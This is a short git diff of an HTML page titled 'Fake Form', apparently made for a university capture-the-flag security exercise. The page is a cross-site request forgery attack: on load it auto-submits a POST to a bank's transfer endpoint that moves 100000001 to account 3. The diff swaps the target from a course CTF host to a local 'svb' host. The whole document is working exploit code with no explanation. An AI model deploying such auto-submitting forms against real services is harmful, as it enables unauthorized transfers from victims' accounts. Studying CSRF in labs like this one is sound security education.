--- a/index.html
+++ b/index.html
@@ -3,10 +3,10 @@
     <title>Fake Form</title>
   </head>
   <body onload="document.bank_form.submit()">
-    <!--    <form action="http://svb:5003/transfer/1" method="POST" name="bank_form" >-->
-    <form action="http://cs2107-ctfd-i.comp.nus.edu:5003/transfer/3" method="POST" name="bank_form" >
-      <input type="text" name="amount" value="100000001" placeholder="Amount">   
-      <input type="text" name="account" value="3" placeholder="To account number">
+   <form action="http://svb:5003/transfer/1" method="POST" name="bank_form" >
+    <!--     <form action="http://cs2107-ctfd-i.comp.nus.edu:5003/transfer/3" method="POST" name="bank_form" >-->
+      <input type="text" name="amount" value="100000001">   
+      <input type="text" name="account" value="3">
     </form>
   </body>
 </html>
